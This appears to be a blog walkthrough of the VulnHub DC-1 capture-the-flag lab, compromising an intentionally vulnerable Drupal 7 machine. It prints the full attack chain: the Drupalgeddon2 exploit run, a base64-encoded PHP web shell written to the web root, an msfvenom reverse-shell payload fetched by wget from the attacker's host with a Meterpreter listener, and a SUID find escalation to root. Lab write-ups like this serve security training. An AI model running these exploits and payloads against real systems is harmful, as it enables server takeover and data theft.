Walkthrough – VulnHUB DC-1

Sharing is caring

Views: 15

Enumeration

Nmap scan

nmap -sC -sV -p- -A -T5 172.16.1.106 -oN dc01.txt            
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 07:04 CEST
Nmap scan report for 172.16.1.106
Host is up (0.0015s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4d659e6774c227a961660678b42488f (DSA)
|   2048 1182fe534edc5b327f446482757dd0a0 (RSA)
|_  256 3daa985c87afea84b823688db9055fd8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36646/udp   status
|   100024  1          41494/udp6  status
|   100024  1          45372/tcp   status
|_  100024  1          52069/tcp6  status
45372/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.69 seconds
                                                                     
Expand

Nmap scan reveals that the target is running a website based on Drupal CMS on port 80.

curl -s http://172.16.1.106 | grep Drupal
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
  <title>Welcome to Drupal Site | Drupal Site</title>
jQuery.extend(Drupal.settings, {"basePath":"\/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"JP_NvjGvJZW9GsMSnepGQmV_csrEgHQ-0pvHs2QWFbc","js":{"misc\/jquery.js":1,"misc\/jquery.once.js":1,"misc\/drupal.js":1},"css":{"modules\/system\/system.base.css":1,"modules\/system\/system.menus.css":1,"modules\/system\/system.messages.css":1,"modules\/system\/system.theme.css":1,"modules\/field\/theme\/field.css":1,"modules\/node\/node.css":1,"modules\/search\/search.css":1,"modules\/user\/user.css":1,"sites\/all\/modules\/views\/css\/views.css":1,"sites\/all\/modules\/ctools\/css\/ctools.css":1,"themes\/bartik\/css\/layout.css":1,"themes\/bartik\/css\/style.css":1,"themes\/bartik\/css\/colors.css":1,"themes\/bartik\/css\/print.css":1,"themes\/bartik\/css\/ie.css":1,"themes\/bartik\/css\/ie6.css":1}}});
                <a href="/" title="Home" rel="home"><span>Drupal Site</span></a>
          Welcome to Drupal Site        </h1>
    <span>Powered by <a href="http://drupal.org">Drupal</a></span>  </div>
Expand

Newer installs of Drupal by default block access to the CHANGELOG.txt and README.txt files, so we may need to do further enumeration. Although the target is running an older version of Drupal (7), these two files are not present or accessible at the moment.

curl -s http://172.16.1.106/CHANGELOG.txt | grep -m2 ""
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "/CHANGELOG.txt" was not found on this server.</p></body></html>

Droopescan

Let’s try a scan with droopescan.

Installing droopescan (sudo pip3 install droopescan)
sudo pip install droopescan

Collecting droopescan
  Downloading droopescan-1.45.1-py2.py3-none-any.whl (514 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 514.8/514.8 kB 2.5 MB/s eta 0:00:00
Collecting cement<2.6.99,>=2.6
  Downloading cement-2.6.2.tar.gz (140 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 140.0/140.0 kB 18.3 MB/s eta 0:00:00
  Preparing metadata (setup.py) ... done
Collecting pystache
  Downloading pystache-0.6.0.tar.gz (78 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 78.2/78.2 kB 10.4 MB/s eta 0:00:00
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from droopescan) (2.28.1)
Building wheels for collected packages: cement, pystache
  Building wheel for cement (setup.py) ... done
  Created wheel for cement: filename=cement-2.6.2-py3-none-any.whl size=80867 sha256=270ef5656f61c18e3eb2a3e5401a8a1a3770c75b31851acdf848a8e3ab081dc0
  Stored in directory: /root/.cache/pip/wheels/a7/a4/bf/82f7524c09a1976794d1354ea71558a151506775012d0c065b
  Building wheel for pystache (pyproject.toml) ... done
  Created wheel for pystache: filename=pystache-0.6.0-py3-none-any.whl size=83618 sha256=d946e50c0f3854a73b017c32dce5988e9f4d58e68718995774b8dbeb8f2f1696
  Stored in directory: /root/.cache/pip/wheels/85/d6/50/39ee0fc0f15b32c9a98467fefff466a68b5cb3a04a76401aca
Successfully built cement pystache
Installing collected packages: cement, pystache, droopescan
Successfully installed cement-2.6.2 droopescan-1.45.1 pystache-0.6.0
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv 

droopescan results,

droopescan scan drupal -u http://172.16.1.106
[+] Plugins found:                                                              
    ctools http://172.16.1.106/sites/all/modules/ctools/
        http://172.16.1.106/sites/all/modules/ctools/LICENSE.txt
        http://172.16.1.106/sites/all/modules/ctools/API.txt
    views http://172.16.1.106/sites/all/modules/views/
        http://172.16.1.106/sites/all/modules/views/README.txt
        http://172.16.1.106/sites/all/modules/views/LICENSE.txt
    profile http://172.16.1.106/modules/profile/
    php http://172.16.1.106/modules/php/
    image http://172.16.1.106/modules/image/

[+] Themes found:
    seven http://172.16.1.106/themes/seven/
    garland http://172.16.1.106/themes/garland/

[+] Possible version(s):
    7.22
    7.23
    7.24
    7.25
    7.26

[+] Possible interesting urls found:
    Default admin - http://172.16.1.106/user/login

[+] Scan finished (0:08:03.932526 elapsed)
Expand

Robots.txt

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
Expand

Now that we’ve confirmed that we are facing Drupal and fingerprinted the version let’s look and see what misconfigurations and vulnerabilities we can uncover to attempt to gain internal network access.

Unlike some CMS’, obtaining a shell on a Drupal host via the admin console is not as easy as just editing a PHP file found within a theme or uploading a malicious PHP script.

Search for vulnerabilities

Searchsploit listed several vulnerabilities found with various versions of Drupal.

searchsploit drupal                               
------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                               |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection                                                                                                                     | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                                                                                                                        | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                                                                                | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                                                                  | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                                                                | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                                                                                      | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                                                                                                                         | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                                                                       | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                                                            | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                                                             | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                                                                  | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                                                                  | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                                                                     | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                                                                       | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                                                           | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                                                                      | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                                                                        | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                                                                | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                                                            | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                                                                     | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                                                                  | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                                                          | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                                                                      | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                                                             | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)                                                        | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                                                               | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                                                           | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                                                            | php/webapps/44501.txt
Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)                                                                                           | php/webapps/50841.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections                                                                                               | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                                                                                                                      | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting                                                                            | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                                                                       | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                                                                              | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                                                                | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                                                                      | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                                                               | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities                                                 | php/webapps/35072.txt
Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation                                                                                                 | php/webapps/50361.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                                                            | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting                                                                                                                | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection                                                                                                      | php/webapps/33410.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Expand

And then, quick google search with version as 7.26 revealed the exploits available for this version of Drupal.

Leveraging Known Vulnerabilities

Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities in existence.

  • CVE-2014-3704, known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.
  • CVE-2018-7600, also known as Drupalgeddon2, is a remote code execution vulnerability, which affects versions of Drupal prior to 7.58 and 8.5.1. The vulnerability occurs due to insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected.
  • CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability that affects multiple versions of Drupal 7.x and 8.x. This flaw exploits improper validation in the Form API.

We will attempt to exploit CVE-2018-7600 to gain initial access to the target.

Exploitation

Exploit Download

Let’s download the vulnerability from the below GitHub directory.

This exploit is written in Ruby language. Follow the below instructions to install the dependencies before executing the exploit.

sudo gem install highline     
[sudo] password for zybersec: 
Fetching highline-2.1.0.gem
Successfully installed highline-2.1.0
Parsing documentation for highline-2.1.0
Installing ri documentation for highline-2.1.0
Done installing documentation for highline after 4 seconds
1 gem installed
Expand

Initial Access

Run the exploit and HURRAY!!!, we got the shell access.uname

./drupalgeddon2.rb http://172.16.1.106
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://172.16.1.106/
--------------------------------------------------------------------------------
[!] MISSING: http://172.16.1.106/CHANGELOG.txt    (HTTP Response: 404)
[!] MISSING: http://172.16.1.106/core/CHANGELOG.txt    (HTTP Response: 404)
[+] Found  : http://172.16.1.106/includes/bootstrap.inc    (HTTP Response: 403)
[+] Header : v7 [X-Generator]
[!] MISSING: http://172.16.1.106/core/includes/bootstrap.inc    (HTTP Response: 404)
[!] MISSING: http://172.16.1.106/includes/database.inc    (HTTP Response: 403)
[+] Found  : http://172.16.1.106/    (HTTP Response: 200)
[+] Metatag: v7.x [Generator]
[!] MISSING: http://172.16.1.106/    (HTTP Response: 200)
[+] Drupal?: v7.x
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo OVAWUMFL
[+] Result : OVAWUMFL
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://172.16.1.106/shell.php)
[i] Response: HTTP 404 // Size: 13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://172.16.1.106/shell.php' -d 'c=hostname'

DC-1>> hostname
DC-1
DC-1>> 
Expand

Privilege Escalation

Enumeration post the initial access,

OS Detection
DC-1>> pwd
/var/www
DC-1>> uname -a
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

MSFVENOM payload generation,

msfvenom payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.27 LPORT=4443 -f raw -o shell.php

[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1112 bytes
Saved as: shell.php

Start a local webserver within the KALI Linux machine.

Python webserver
C:\home\zybersec\Desktop\dc1> ls
dc01.txt  drupalgeddon2.rb  shell.php
                                                                                                                                                                                               
C:\home\zybersec\Desktop\dc1> python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Download the payload to the target

Payload delivery to target
DC-1>> wget -O phpshell.php http://172.16.1.27/shell.php
--2023-04-29 19:15:13--  http://172.16.1.27/shell.php
Connecting to 172.16.1.27:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1112 (1.1K) [application/octet-stream]
Saving to: `phpshell.php'

     0K .                                                     100%  354K=0.003s

2023-04-29 19:15:13 (354 KB/s) - `phpshell.php' saved [1112/1112]

DC-1>> ls
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
linpeas_linux_amd64
misc
modules
phpshell.php
profiles
robots.txt
scripts
shell.php
shell.php.1
shell.php.2
sites
themes
update.php
web.config
webshell.php
xmlrpc.php
DC-1>> 
Expand

Start a meterpreter listener,

Meterpreter listener
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.16.1.27
LHOST => 172.16.1.27
msf6 exploit(multi/handler) > set LPORT 4443
LPORT => 4443
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.1.27:4443 

Execute the payload by visiting the http://172.16.1.106/phpshell.php

meterpreter shell access

# meterpreter shell acess
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.1.27:4443 
[*] Sending stage (39927 bytes) to 172.16.1.106
[*] Meterpreter session 1 opened (172.16.1.27:4443 -> 172.16.1.106:53738) at 2023-04-29 09:27:23 +0200

meterpreter > getuid
Server username: www-data
meterpreter > getsystem
[-] The "getsystem" command requires the "priv" extension to be loaded (run: `load priv`)
meterpreter > sysinfo
Computer    : DC-1
OS          : Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
Meterpreter : php/linux
meterpreter > 

The kernel version (OS : Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686) of the target appears to be vulnerable to kernel exploit ‘DirtyCOW’.

Stabilising the shell and searching for SUID binaries

Stabilising the shell
meterpreter > shell
Process 25839 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DC-1:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
www-data@DC-1:/var/www$ 
Expand

As “find” command has SUID bit set, we can execute the command as “root” user. 

Abusing SUID binaries

As “find” command has SUID bit set, we can execute the command as “root” user. 

We create a file called “zyber” and use “find” command to check if is executing the commands as root user, the reason for creating a file is so that we can use with “find” command. As running it with a single file will run the command only once.  

Priviesc
www-data@DC-1:/var/www$ touch zyber
touch zyber
www-data@DC-1:/var/www$ find zyber -exec "whoami" \;                                          
find zyber -exec "whoami" \;
root
www-data@DC-1:/var/www$ find zyber -exec "/bin/sh" \;
find zyber -exec "/bin/sh" \;
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root
Expand
Privilege Escalation
www-data@DC-1:/var/www$ touch zyber
touch zyber
www-data@DC-1:/var/www$ find zyber -exec "whoami" \;                                          
find zyber -exec "whoami" \;
root
www-data@DC-1:/var/www$ find zyber -exec "/bin/sh" \;
find zyber -exec "/bin/sh" \;
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root
# 

Finding the Flags

First Flag – flag1.txt

It’s located in the folder /var/www

DC-1>> whoami
www-data
DC-1>> ls -la
total 192
drwxr-xr-x  9 www-data www-data  4096 Apr 29 18:32 .
drwxr-xr-x 12 root     root      4096 Feb 19  2019 ..
-rw-r--r--  1 www-data www-data   174 Nov 21  2013 .gitignore
-rw-r--r--  1 www-data www-data  5767 Nov 21  2013 .htaccess
-rw-r--r--  1 www-data www-data  1481 Nov 21  2013 COPYRIGHT.txt
-rw-r--r--  1 www-data www-data  1451 Nov 21  2013 INSTALL.mysql.txt
-rw-r--r--  1 www-data www-data  1874 Nov 21  2013 INSTALL.pgsql.txt
-rw-r--r--  1 www-data www-data  1298 Nov 21  2013 INSTALL.sqlite.txt
-rw-r--r--  1 www-data www-data 17861 Nov 21  2013 INSTALL.txt
-rwxr-xr-x  1 www-data www-data 18092 Nov  1  2013 LICENSE.txt
-rw-r--r--  1 www-data www-data  8191 Nov 21  2013 MAINTAINERS.txt
-rw-r--r--  1 www-data www-data  5376 Nov 21  2013 README.txt
-rw-r--r--  1 www-data www-data  9642 Nov 21  2013 UPGRADE.txt
-rw-r--r--  1 www-data www-data  6604 Nov 21  2013 authorize.php
-rw-r--r--  1 www-data www-data   720 Nov 21  2013 cron.php
-rw-r--r--  1 www-data www-data    52 Feb 19  2019 flag1.txt
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 includes
-rw-r--r--  1 www-data www-data   529 Nov 21  2013 index.php
-rw-r--r--  1 www-data www-data   703 Nov 21  2013 install.php
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 misc
drwxr-xr-x 42 www-data www-data  4096 Nov 21  2013 modules
drwxr-xr-x  5 www-data www-data  4096 Nov 21  2013 profiles
-rw-r--r--  1 www-data www-data  1561 Nov 21  2013 robots.txt
drwxr-xr-x  2 www-data www-data  4096 Nov 21  2013 scripts
-rw-r--r--  1 www-data www-data    75 Apr 29 18:32 shell.php
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 sites
drwxr-xr-x  7 www-data www-data  4096 Nov 21  2013 themes
-rw-r--r--  1 www-data www-data 19941 Nov 21  2013 update.php
-rw-r--r--  1 www-data www-data  2178 Nov 21  2013 web.config
-rw-r--r--  1 www-data www-data   417 Nov 21  2013 xmlrpc.php
DC-1>> cat flag1.txt
Every good CMS needs a config file - and so do you.
Expand

Final Flag – thefinalflag.txt

# cd /root
cd /root
# ls 
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7